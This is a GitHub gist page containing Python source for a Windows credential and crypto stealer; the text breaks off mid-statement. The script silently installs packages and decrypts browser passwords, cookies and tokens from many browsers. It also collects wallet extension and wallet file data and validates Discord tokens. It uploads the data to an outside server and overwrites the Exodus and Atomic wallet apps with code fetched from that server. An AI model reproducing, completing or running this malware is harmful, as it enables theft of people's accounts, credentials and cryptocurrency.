Created
January 13, 2025 18:20
-
-
Save carcigenicate/f446581246cd7270d3b29a35e4eb58e4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64\nimport json\nimport os\nimport re\nimport sqlite3\nimport shutil\nimport subprocess\nimport zipfile\nimport sys\nfrom zipfile import ZipFile\nfrom urllib.request import Request, urlopen\nimport time\n\nuserid = "3"\n\nCURRENT_INTERPRETER = sys.executable\nproc = subprocess.Popen([CURRENT_INTERPRETER, "-m", "pip", "install", "pycryptodome", "pypiwin32", "pywin32","requests", "websocket-client"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW)\nproc.wait()\n\ntry:\n import win32crypt\n from Crypto.Cipher import AES\n import requests\n import websocket\n\nexcept:\n current_file = os.path.abspath(__file__)\n subprocess.Popen([CURRENT_INTERPRETER, current_file], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,creationflags=subprocess.CREATE_NO_WINDOW)\n exit()\n\nUSER_PROFILE = os.getenv(\'USERPROFILE\')\nAPPDATA = os.getenv(\'APPDATA\')\nLOCALAPPDATA = os.getenv(\'LOCALAPPDATA\')\nSTORAGE_PATH = os.path.join(APPDATA, "Microsoft Store")\nMAIN_URL = "https://pentagon.cy"\nPROGRAMFILESX86 = os.getenv("ProgramFiles(x86)")\n\nCOOKIECOUNT = 0\nFILES = []\n\nif os.path.exists(os.path.join(LOCALAPPDATA, "HD Realtek Audio Player")):\n sys.exit(0)\nelse:\n os.makedirs(os.path.join(LOCALAPPDATA, "HD Realtek Audio Player"))\n\nif not os.path.exists(STORAGE_PATH):\n os.makedirs(STORAGE_PATH)\n\nCHROME_PATHS = [\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": "C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome (x86)", "path": os.path.join(LOCALAPPDATA, "Google(x86)", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": PROGRAMFILESX86 + "\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data"), "taskname": "chrome.exe", "exepath": LOCALAPPDATA + "\\\\Google\\\\Chrome SxS\\\\Application\\\\chrome.exe"},\n\t{"name": "Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data"), "taskname": "msedge.exe", "exepath": PROGRAMFILESX86 + "\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe"},\n\t{"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data"), "taskname": "brave.exe", "exepath": "C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe"},\n]\n\nCHROMIUM_BROWSERS = [\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": "C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome (x86)", "path": os.path.join(LOCALAPPDATA, "Google(x86)", "Chrome", "User Data"), "taskname": "chrome.exe", "exepath": PROGRAMFILESX86 + "\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe"},\n\t{"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data"), "taskname": "chrome.exe", "exepath": LOCALAPPDATA + "\\\\Google\\\\Chrome SxS\\\\Application\\\\chrome.exe"},\n\t{"name": "Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data"), "taskname": "msedge.exe", "exepath": PROGRAMFILESX86 + "\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe"},\n\t{"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data"), "taskname": "brave.exe", "exepath": "C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe"},\n {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable"), "taskname": "opera.exe", "exepath": ""},\n {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable"), "taskname": "opera.exe", "exepath": ""},\n {"name": "Yandex", "path": os.path.join(APPDATA, "Yandex", "YandexBrowser", "User Data"), "taskname": "yandex.exe", "exepath": ""},\n {"name": "Chromium", "path": os.path.join(LOCALAPPDATA, "Chromium", "User Data"), "taskname": "chromium.exe", "exepath": ""},\n {"name": "Thorium", "path": os.path.join(LOCALAPPDATA, "Thorium", "User Data"), "taskname": "thorium.exe", "exepath": ""},\n {"name": "Maple", "path": os.path.join(LOCALAPPDATA, "MapleStudio", "ChromePlus", "User Data"), "taskname": "maple.exe", "exepath": ""},\n {"name": "Iridium", "path": os.path.join(LOCALAPPDATA, "Iridium", "User Data"), "taskname": "iridium.exe", "exepath": ""},\n {"name": "7Star", "path": os.path.join(LOCALAPPDATA, "7Star", "7Star", "User Data"), "taskname": "7star.exe", "exepath": ""},\n {"name": "CentBrowser", "path": os.path.join(LOCALAPPDATA, "CentBrowser", "User Data"), "taskname": "centbrowser.exe", "exepath": ""},\n {"name": "Chedot", "path": os.path.join(LOCALAPPDATA, "Chedot", "User Data"), "taskname": "chedot.exe", "exepath": ""},\n {"name": "Vivaldi", "path": os.path.join(LOCALAPPDATA, "Vivaldi", "User Data"), "taskname": "vivaldi.exe", "exepath": ""},\n {"name": "Kometa", "path": os.path.join(LOCALAPPDATA, "Kometa", "User Data"), "taskname": "kometa.exe", "exepath": ""},\n {"name": "Elements", "path": os.path.join(LOCALAPPDATA, "Elements Browser", "User Data"), "taskname": "elements.exe", "exepath": ""},\n {"name": "Epic Privacy Browser", "path": os.path.join(LOCALAPPDATA, "Epic Privacy Browser", "User Data"), "taskname": "epic.exe", "exepath": ""},\n {"name": "Uran", "path": os.path.join(LOCALAPPDATA, "uCozMedia", "Uran", "User Data"), "taskname": "uran.exe", "exepath": ""},\n {"name": "Fenrir", "path": os.path.join(LOCALAPPDATA, "Fenrir Inc", "Sleipnir5", "setting", "modules", "ChromiumViewer"), "taskname": "fenrir.exe", "exepath": ""},\n {"name": "Catalina", "path": os.path.join(LOCALAPPDATA, "CatalinaGroup", "Citrio", "User Data"), "taskname": "catalina.exe", "exepath": ""},\n {"name": "Coowon", "path": os.path.join(LOCALAPPDATA, "Coowon", "Coowon", "User Data"), "taskname": "coowon.exe", "exepath": ""},\n {"name": "Liebao", "path": os.path.join(LOCALAPPDATA, "liebao", "User Data"), "taskname": "liebao.exe", "exepath": ""},\n {"name": "QIP Surf", "path": os.path.join(LOCALAPPDATA, "QIP Surf", "User Data"), "taskname": "qipsurf.exe", "exepath": ""},\n {"name": "Orbitum", "path": os.path.join(LOCALAPPDATA, "Orbitum", "User Data"), "taskname": "orbitum.exe", "exepath": ""},\n {"name": "Dragon", "path": os.path.join(LOCALAPPDATA, "Comodo", "Dragon", "User Data"), "taskname": "dragon.exe", "exepath": ""},\n {"name": "360Browser", "path": os.path.join(LOCALAPPDATA, "360Browser", "Browser", "User Data"), "taskname": "360browser.exe", "exepath": ""},\n {"name": "Maxthon", "path": os.path.join(LOCALAPPDATA, "Maxthon3", "User Data"), "taskname": "maxthon.exe", "exepath": ""},\n {"name": "K-Melon", "path": os.path.join(LOCALAPPDATA, "K-Melon", "User Data"), "taskname": "kmelon.exe", "exepath": ""},\n {"name": "CocCoc", "path": os.path.join(LOCALAPPDATA, "CocCoc", "Browser", "User Data"), "taskname": "coccoc.exe", "exepath": ""},\n {"name": "Amigo", "path": os.path.join(LOCALAPPDATA, "Amigo", "User Data"), "taskname": "amigo.exe", "exepath": ""},\n {"name": "Torch", "path": os.path.join(LOCALAPPDATA, "Torch", "User Data"), "taskname": "torch.exe", "exepath": ""},\n {"name": "Sputnik", "path": os.path.join(LOCALAPPDATA, "Sputnik", "Sputnik", "User Data"), "taskname": "sputnik.exe", "exepath": ""},\n {"name": "DCBrowser", "path": os.path.join(LOCALAPPDATA, "DCBrowser", "User Data"), "taskname": "dcbrowser.exe", "exepath": ""},\n {"name": "UR Browser", "path": os.path.join(LOCALAPPDATA, "UR Browser", "User Data"), "taskname": "urbrowser.exe", "exepath": ""},\n {"name": "Slimjet", "path": os.path.join(LOCALAPPDATA, "Slimjet", "User Data"), "taskname": "slimjet.exe", "exepath": ""},\n]\n\nCHROMIUM_SUBPATHS = [\n {"path": ""},\n {"path": "Default"},\n {"path": "Profile 1"},\n {"path": "Profile 2"},\n {"path": "Profile 3"},\n {"path": "Profile 4"},\n {"path": "Profile 5"},\n]\n\nBROWSER_EXTENSIONS = [\n {"name": "Authenticator", "path": "\\\\Local Extension Settings\\\\bhghoamapcdpbohphigoooaddinpkbai"},\n {"name": "Binance", "path": "\\\\Local Extension Settings\\\\fhbohimaelbohpjbbldcngcnapndodjp"},\n {"name": "Bitapp", "path": "\\\\Local Extension Settings\\\\fihkakfobkmkjojpchpfgcmhfjnmnfpi"},\n {"name": "BoltX", "path": "\\\\Local Extension Settings\\\\aodkkagnadcbobfpggfnjeongemjbjca"},\n {"name": "Coin98", "path": "\\\\Local Extension Settings\\\\aeachknmefphepccionboohckonoeemg"},\n {"name": "Coinbase", "path": "\\\\Local Extension Settings\\\\hnfanknocfeofbddgcijnmhnfnkdnaad"},\n {"name": "Core", "path": "\\\\Local Extension Settings\\\\agoakfejjabomempkjlepdflaleeobhb"},\n {"name": "Crocobit", "path": "\\\\Local Extension Settings\\\\pnlfjmlcjdjgkddecgincndfgegkecke"},\n {"name": "Equal", "path": "\\\\Local Extension Settings\\\\blnieiiffboillknjnepogjhkgnoapac"},\n {"name": "Ever", "path": "\\\\Local Extension Settings\\\\cgeeodpfagjceefieflmdfphplkenlfk"},\n {"name": "ExodusWeb3", "path": "\\\\Local Extension Settings\\\\aholpfdialjgjfhomihkjbmgjidlcdno"},\n {"name": "Fewcha", "path": "\\\\Local Extension Settings\\\\ebfidpplhabeedpnhjnobghokpiioolj"},\n {"name": "Finnie", "path": "\\\\Local Extension Settings\\\\cjmkndjhnagcfbpiemnkdpomccnjblmj"},\n {"name": "Guarda", "path": "\\\\Local Extension Settings\\\\hpglfhgfnhbgpjdenjgmdgoeiappafln"},\n {"name": "Guild", "path": "\\\\Local Extension Settings\\\\nanjmdknhkinifnkgdcggcfnhdaammmj"},\n {"name": "HarmonyOutdated", "path": "\\\\Local Extension Settings\\\\fnnegphlobjdpkhecapkijjdkgcjhkib"},\n {"name": "Iconex", "path": "\\\\Local Extension Settings\\\\flpiciilemghbmfalicajoolhkkenfel"},\n {"name": "Jaxx Liberty", "path": "\\\\Local Extension Settings\\\\cjelfplplebdjjenllpjcblmjkfcffne"},\n {"name": "Kaikas", "path": "\\\\Local Extension Settings\\\\jblndlipeogpafnldhgmapagcccfchpi"},\n {"name": "KardiaChain", "path": "\\\\Local Extension Settings\\\\pdadjkfkgcafgbceimcpbkalnfnepbnk"},\n {"name": "Keplr", "path": "\\\\Local Extension Settings\\\\dmkamcknogkgcdfhhbddcghachkejeap"},\n {"name": "Liquality", "path": "\\\\Local Extension Settings\\\\kpfopkelmapcoipemfendmdcghnegimn"},\n {"name": "MEWCX", "path": "\\\\Local Extension Settings\\\\nlbmnnijcnlegkjjpcfjclmcfggfefdm"},\n {"name": "MaiarDEFI", "path": "\\\\Local Extension Settings\\\\dngmlblcodfobpdpecaadgfbcggfjfnm"},\n {"name": "Martian", "path": "\\\\Local Extension Settings\\\\efbglgofoippbgcjepnhiblaibcnclgk"},\n {"name": "Math", "path": "\\\\Local Extension Settings\\\\afbcbjpbpfadlkmhmclhkeeodmamcflc"},\n {"name": "Metamask", "path": "\\\\Local Extension Settings\\\\nkbihfbeogaeaoehlefnkodbefgpgknn"},\n {"name": "Metamask2", "path": "\\\\Local Extension Settings\\\\ejbalbakoplchlghecdalmeeeajnimhm"},\n {"name": "Mobox", "path": "\\\\Local Extension Settings\\\\fcckkdbjnoikooededlapcalpionmalo"},\n {"name": "Nami", "path": "\\\\Local Extension Settings\\\\lpfcbjknijpeeillifnkikgncikgfhdo"},\n {"name": "Nifty", "path": "\\\\Local Extension Settings\\\\jbdaocneiiinmjbjlgalhcelgbejmnid"},\n {"name": "Oxygen", "path": "\\\\Local Extension Settings\\\\fhilaheimglignddkjgofkcbgekhenbh"},\n {"name": "PaliWallet", "path": "\\\\Local Extension Settings\\\\mgffkfbidihjpoaomajlbgchddlicgpn"},\n {"name": "Petra", "path": "\\\\Local Extension Settings\\\\ejjladinnckdgjemekebdpeokbikhfci"},\n {"name": "Phantom", "path": "\\\\Local Extension Settings\\\\bfnaelmomeimhlpmgjnjophhpkkoljpa"},\n {"name": "Pontem", "path": "\\\\Local Extension Settings\\\\phkbamefinggmakgklpkljjmgibohnba"},\n {"name": "Ronin", "path": "\\\\Local Extension Settings\\\\fnjhmkhhmkbjkkabndcnnogagogbneec"},\n {"name": "Safepal", "path": "\\\\Local Extension Settings\\\\lgmpcpglpngdoalbgeoldeajfclnhafa"},\n {"name": "Saturn", "path": "\\\\Local Extension Settings\\\\nkddgncdjgjfcddamfgcmfnlhccnimig"},\n {"name": "Slope", "path": "\\\\Local Extension Settings\\\\pocmplpaccanhmnllbbkpgfliimjljgo"},\n {"name": "Solfare", "path": "\\\\Local Extension Settings\\\\bhhhlbepdkbapadjdnnojkbgioiodbic"},\n {"name": "Sollet", "path": "\\\\Local Extension Settings\\\\fhmfendgdocmcbmfikdcogofphimnkno"},\n {"name": "Starcoin", "path": "\\\\Local Extension Settings\\\\mfhbebgoclkghebffdldpobeajmbecfk"},\n {"name": "Swash", "path": "\\\\Local Extension Settings\\\\cmndjbecilbocjfkibfbifhngkdmjgog"},\n {"name": "TempleTezos", "path": "\\\\Local Extension Settings\\\\ookjlbkiijinhpmnjffcofjonbfbgaoc"},\n {"name": "TerraStation", "path": "\\\\Local Extension Settings\\\\aiifbnbfobpmeekipheeijimdpnlpgpp"},\n {"name": "Tokenpocket", "path": "\\\\Local Extension Settings\\\\mfgccjchihfkkindfppnaooecgfneiii"},\n {"name": "Ton", "path": "\\\\Local Extension Settings\\\\nphplpgoakhhjchkkhmiggakijnkhfnd"},\n {"name": "Tron", "path": "\\\\Local Extension Settings\\\\ibnejdfjmmkpcnlpebklmnkoeoihofec"},\n {"name": "Trust Wallet", "path": "\\\\Local Extension Settings\\\\egjidjbpglichdcondbcbdnbeeppgdph"},\n {"name": "Wombat", "path": "\\\\Local Extension Settings\\\\amkmjjmmflddogmhpjloimipbofnfjih"},\n {"name": "XDEFI", "path": "\\\\Local Extension Settings\\\\hmeobnfnfcmdkdcmlblgagmfpfboieaf"},\n {"name": "XMR.PT", "path": "\\\\Local Extension Settings\\\\eigblbgjknlfbajkfhopmcojidlgcehm"},\n {"name": "XinPay", "path": "\\\\Local Extension Settings\\\\bocpokimicclpaiekenaeelehdjllofo"},\n {"name": "Yoroi", "path": "\\\\Local Extension Settings\\\\ffnbelfdoeiohenkjibnmadjiehjhajb"},\n {"name": "iWallet", "path": "\\\\Local Extension Settings\\\\kncchdigobghenbbaddojjnnaogfppfj"}\n]\n\nWALLET_PATHS = [\n {"name": "Atomic", "path": os.path.join(APPDATA, "atomic", "Local Storage", "leveldb")},\n {"name": "Exodus", "path": os.path.join(APPDATA, "Exodus", "exodus.wallet")},\n {"name": "Electrum", "path": os.path.join(APPDATA, "Electrum", "wallets")},\n {"name": "Electrum-LTC", "path": os.path.join(APPDATA, "Electrum-LTC", "wallets")},\n {"name": "Zcash", "path": os.path.join(APPDATA, "Zcash")},\n {"name": "Armory", "path": os.path.join(APPDATA, "Armory")},\n {"name": "Bytecoin", "path": os.path.join(APPDATA, "bytecoin")},\n {"name": "Jaxx", "path": os.path.join(APPDATA, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb")},\n {"name": "Etherium", "path": os.path.join(APPDATA, "Ethereum", "keystore")},\n {"name": "Guarda", "path": os.path.join(APPDATA, "Guarda", "Local Storage", "leveldb")},\n {"name": "Coinomi", "path": os.path.join(APPDATA, "Coinomi", "Coinomi", "wallets")},\n]\n\nPATHS_TO_SEARCH = [\n USER_PROFILE + "\\\\Desktop",\n USER_PROFILE + "\\\\Documents",\n USER_PROFILE + "\\\\Downloads",\n USER_PROFILE + "\\\\OneDrive\\\\Documents",\n USER_PROFILE + "\\\\OneDrive\\\\Desktop",\n]\n\nFILE_KEYWORDS = [\n "passw",\n "mdp",\n "motdepasse",\n "mot_de_passe",\n "login",\n "secret",\n "account",\n "acount",\n "paypal",\n "banque",\n "metamask",\n "wallet",\n "crypto",\n "exodus",\n "discord",\n "2fa",\n "code",\n "memo",\n "compte",\n "token",\n "backup",\n "seecret"\n "passphrase"\n]\n\nALLOWED_EXTENSIONS = [\n ".txt",\n ".log",\n ".doc",\n ".docx",\n ".xls",\n ".xlsx",\n ".ppt",\n ".pptx",\n ".odt",\n ".pdf",\n ".rtf",\n ".json",\n ".csv",\n ".db",\n ".jpg",\n ".jpeg",\n ".png",\n ".gif",\n ".webp",\n ".mp4"\n]\n\nDISCORD_PATHS = [\n {"name": "Discord", "path": os.path.join(APPDATA, "discord", "Local Storage", "leveldb")},\n {"name": "Discord Canary", "path": os.path.join(APPDATA, "discordcanary", "Local Storage", "leveldb")},\n {"name": "Discord PTB", "path": os.path.join(APPDATA, "discordptb", "Local Storage", "leveldb")},\n {"name": "Opera", "path": os.path.join(APPDATA, "Opera Software", "Opera Stable", "Local Storage", "leveldb")},\n {"name": "Opera GX", "path": os.path.join(APPDATA, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb")},\n {"name": "Amigo", "path": os.path.join(LOCALAPPDATA, "Amigo", "User Data", "Local Storage", "leveldb")},\n {"name": "Torch", "path": os.path.join(LOCALAPPDATA, "Torch", "User Data", "Local Storage", "leveldb")},\n {"name": "Kometa", "path": os.path.join(LOCALAPPDATA, "Kometa", "User Data", "Local Storage", "leveldb")},\n {"name": "Orbitum", "path": os.path.join(LOCALAPPDATA, "Orbitum", "User Data", "Local Storage", "leveldb")},\n {"name": "CentBrowser", "path": os.path.join(LOCALAPPDATA, "CentBrowser", "User Data", "Local Storage", "leveldb")},\n {"name": "7Star", "path": os.path.join(LOCALAPPDATA, "7Star", "7Star", "User Data", "Local Storage", "leveldb")},\n {"name": "Sputnik", "path": os.path.join(LOCALAPPDATA, "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb")},\n {"name": "Vivaldi", "path": os.path.join(LOCALAPPDATA, "Vivaldi", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Chrome SxS", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome SxS", "User Data", "Local Storage", "leveldb")},\n {"name": "Chrome", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Chrome1", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb")},\n {"name": "Chrome2", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb")},\n {"name": "Chrome3", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb")},\n {"name": "Chrome4", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb")},\n {"name": "Chrome5", "path": os.path.join(LOCALAPPDATA, "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb")},\n {"name": "Epic Privacy Browser", "path": os.path.join(LOCALAPPDATA, "Epic Privacy Browser", "User Data", "Local Storage", "leveldb")},\n {"name": "Microsoft Edge", "path": os.path.join(LOCALAPPDATA, "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Uran", "path": os.path.join(LOCALAPPDATA, "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Yandex", "path": os.path.join(LOCALAPPDATA, "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Brave", "path": os.path.join(LOCALAPPDATA, "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb")},\n {"name": "Iridium", "path": os.path.join(LOCALAPPDATA, "Iridium", "User Data", "Default", "Local Storage", "leveldb")}\n]\n\nDISCORD_TOKENS = []\nPASSWORDS = []\nCOOKIES = []\nWEB_DATA = []\nDISCORD_IDS = []\n\ndef kill_process(process_name):\n result = subprocess.Popen(f"taskkill /im {process_name} /t /f >nul 2>&1", shell=True)\n\ndef decrypt_data(data, key):\n try:\n iv = data[3:15]\n data = data[15:]\n cipher = AES.new(key, AES.MODE_GCM, iv)\n return cipher.decrypt(data)[:-16].decode()\n except:\n return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])\n\ndef zip_to_storage(name, source, destination):\n if os.path.isfile(source):\n with zipfile.ZipFile(destination + f"\\\\{name}.zip", "w") as z:\n z.write(source, os.path.basename(source))\n else:\n with zipfile.ZipFile(destination + f"\\\\{name}.zip", "w") as z:\n for root, dirs, files in os.walk(source):\n for file in files:\n z.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), os.path.join(source, \'..\')))\n\ndef upload_to_server(filepath, loguuid):\n for i in range(10):\n try:\n url = MAIN_URL + "/delivery"\n files = {\'file\': open(filepath, \'rb\')}\n headers = {\'X-Trace-ID\': loguuid}\n r = requests.post(url, files=files, headers = headers)\n if r.status_code == 200:\n break\n except: pass\n\ndef validate_discord_token(token):\n r = requests.get("https://discord.com/api/v9/users/@me", headers={"Authorization": token})\n if r.status_code == 200:\n return r.json()\n else:\n return None\n\ndef taskkill(taskname):\n subprocess.run(["taskkill", "/F", "/IM", taskname], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\ndef inject(loguuid):\n path = os.path.join(LOCALAPPDATA, "exodus")\n if not os.path.exists(path): return\n listOfFile = os.listdir(path)\n apps = []\n for file in listOfFile:\n if "app-" in file:\n apps += [file]\n exodusPatchURL = MAIN_URL + "/exodus"\n req = Request(exodusPatchURL)\n response = urlopen(req)\n data = response.read()\n kill_process("exodus.exe")\n for app in apps:\n try:\n fullpath = f"{path}\\\\{app}\\\\resources\\\\app.asar"\n\n with open(fullpath, \'wb\') as out_file1:\n\n out_file1.write(data)\n licensepath = f"{path}\\\\{app}\\\\LICENSE"\n with open(licensepath, "w") as out_file2:\n out_file2.write(loguuid)\n\n except: pass\n\ndef inject_atomic(loguuid):\n path = os.path.join(LOCALAPPDATA, "Programs", "atomic")\n if not os.path.exists(path): return\n atomicPatchURL = MAIN_URL + "/atomic"\n req = Request(atomicPatchURL)\n response = urlopen(req)\n data = response.read()\n kill_process("Atomic Wallet.exe")\n try:\n fullpath = f"{path}\\\\resources\\\\app.asar"\n with open(fullpath, \'wb\') as out_file1:\n\n out_file1.write(data)\n licensepath = f"{path}\\\\LICENSE.electron.txt"\n with open(licensepath, "w") as out_file2:\n out_file2.write(loguuid)\n except: pass\n\ndef chromiumcookies(profilepath):\n try:\n cookies_file = os.path.join(profilepath, "Network", "Cookies")\n temp_db = os.path.join(profilepath, f"{browser[\'name\']}-ck.db")\n shutil.copy(cookies_file, temp_db)\n connection = sqlite3.connect(temp_db)\n cursor = connection.cursor()\n\n cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")\n\n cookie_str = ""\n\n for row in cursor.fetchall():\n\n host = row[0]\n\n name = row[1]\n\n value = decrypt_data(row[2], decryption_key)\n\n cookie_str += f"{host}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{name}\\t{value}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": browser["name"], "profile": subpath["name"], "cookies": base64.b64encode(cookie_str.encode()).decode()})\n cursor.close()\n connection.close()\n os.remove(temp_db)\n except: pass\n\nfor browser in CHROMIUM_BROWSERS:\n taskkill(browser["taskname"])\n local_state = os.path.join(browser["path"], "Local State")\n if not os.path.exists(local_state): continue\n\n with open(local_state, "r", encoding="utf-8") as f:\n local_state = json.loads(f.read())\n\n key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]\n try:\n decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]\n except:\n pass\n for subpath in CHROMIUM_SUBPATHS:\n\n if not os.path.exists(os.path.join(browser["path"], subpath["path"])): continue\n\n try:\n login_data_file = os.path.join(browser["path"], subpath["path"], "Login Data")\n temp_db = os.path.join(browser["path"], subpath["path"], f"{browser[\'name\']}-pw.db")\n shutil.copy(login_data_file, temp_db)\n\n connection = sqlite3.connect(temp_db)\n\n cursor = connection.cursor()\n\n cursor.execute("SELECT origin_url, username_value, password_value FROM logins")\n\n for row in cursor.fetchall():\n\n origin_url = row[0]\n\n username = row[1]\n\n password = decrypt_data(row[2], decryption_key)\n\n if username or password:\n PASSWORDS.append({"browser": browser["name"], "url": origin_url, "username": username, "password": password})\n cursor.close()\n connection.close()\n os.remove(temp_db)\n\n except:\n pass\n\n try:\n if browser["exepath"] == "":\n chromiumcookies(os.path.join(browser["path"], subpath["path"]))\n except:\n pass\n\n try:\n web_data_file = os.path.join(browser["path"], subpath["path"], "Web Data")\n\n temp_db = os.path.join(browser["path"], subpath["path"], f"{browser[\'name\']}-webdata.db")\n\n shutil.copy(web_data_file, temp_db)\n\n connection = sqlite3.connect(temp_db)\n\n cursor = connection.cursor()\n\n cursor.execute("SELECT service, encrypted_token FROM token_service")\n\n for row in cursor.fetchall():\n web_service = row[0]\n web_token = decrypt_data(row[1], decryption_key)\n WEB_DATA.append({"account_id": web_service, "refresh_token": web_token})\n\n cursor.close()\n\n connection.close()\n os.remove(temp_db)\n except:\n pass\n\n for extension in BROWSER_EXTENSIONS:\n extension_path = os.path.join(browser["path"], subpath["path"]) + extension["path"]\n if os.path.exists(extension_path):\n try:\n zip_to_storage(f"{browser[\'name\']}-{subpath[\'name\']}-{extension[\'name\']}", extension_path, STORAGE_PATH)\n except:\n pass\n\nfirefox_path = os.path.join(APPDATA, \'Mozilla\', \'Firefox\', \'Profiles\')\n\nif os.path.exists(firefox_path):\n taskkill("firefox.exe")\n for profile in os.listdir(firefox_path):\n\n try:\n\n if profile.endswith(\'.default\') or profile.endswith(\'.default-release\'):\n\n profile_path = os.path.join(firefox_path, profile)\n\n if os.path.exists(os.path.join(profile_path, "cookies.sqlite")):\n\n shutil.copy(os.path.join(profile_path, "cookies.sqlite"), os.path.join(profile_path, "cookies-copy.sqlite"))\n connection = sqlite3.connect(os.path.join(profile_path, "cookies-copy.sqlite"))\n cursor = connection.cursor()\n\n cursor.execute("SELECT host, name, value FROM moz_cookies")\n\n cookie_str = ""\n for row in cursor.fetchall():\n host, name, value = row\n cookie_str += f"{host}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{name}\\t{value}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": "Firefox", "profile": profile, "cookies": base64.b64encode(cookie_str.encode()).decode()})\n cursor.close()\n connection.close()\n os.remove(os.path.join(profile_path, "cookies-copy.sqlite"))\n except:\n continue\n\nfor wallet_file in WALLET_PATHS:\n if os.path.exists(wallet_file["path"]):\n try:\n zip_to_storage(wallet_file["name"], wallet_file["path"], STORAGE_PATH)\n except:\n pass\n\nfor discord_path in DISCORD_PATHS:\n if not os.path.exists(discord_path["path"]): continue\n try:\n name_without_spaces = discord_path["name"].replace(" ", "")\n if "cord" in discord_path["path"]:\n if not os.path.exists(APPDATA + f"\\\\{name_without_spaces}\\\\Local State"): continue\n try:\n with open(APPDATA + f"\\\\{name_without_spaces}\\\\Local State", "r", encoding="utf-8") as f:\n local_state = json.loads(f.read())\n\n key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]\n\n decryption_key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]\n\n for file_name in os.listdir(discord_path["path"]):\n if file_name[-3:] not in ["ldb", "log"]: continue\n for line in [x.strip() for x in open(f\'{discord_path["path"]}\\\\{file_name}\', errors=\'ignore\').readlines() if x.strip()]:\n for y in re.findall(r"dQw4w9WgXcQ:[^\\"]*", line):\n\n token = decrypt_data(base64.b64decode(y.split(\'dQw4w9WgXcQ:\')[1]), decryption_key)\n token_data = validate_discord_token(token)\n\n if token_data:\n if token_data["id"] not in DISCORD_IDS:\n DISCORD_IDS.append(token_data["id"])\n username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data[\'username\']}#{token_data[\'discriminator\']}"\n phone_number = token_data["phone"] if token_data["phone"] else "Not linked"\n DISCORD_TOKENS.append(\n {"token": token, "user_id": token_data["id"], "username": username,\n "displayname": token_data["global_name"], "email": token_data["email"],\n "phone": phone_number})\n TOKENCOUNT = TOKENCOUNT+1\n except:\n pass\n else:\n for file_name in os.listdir(discord_path["path"]):\n if file_name[-3:] not in ["ldb", "log"]: continue\n for line in [x.strip() for x in open(f\'{discord_path["path"]}\\\\{file_name}\', errors=\'ignore\').readlines() if x.strip()]:\n for token in re.findall(r"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}", line):\n token_data = validate_discord_token(token)\n if token_data:\n if token_data["id"] not in DISCORD_IDS:\n DISCORD_IDS.append(token_data["id"])\n username = token_data["username"] if token_data["discriminator"] == "0" else f"{token_data[\'username\']}#{token_data[\'discriminator\']}"\n phone_number = token_data["phone"] if token_data["phone"] else "Not linked"\n DISCORD_TOKENS.append(\n {"token": token, "user_id": token_data["id"], "username": username,\n "displayname": token_data["global_name"], 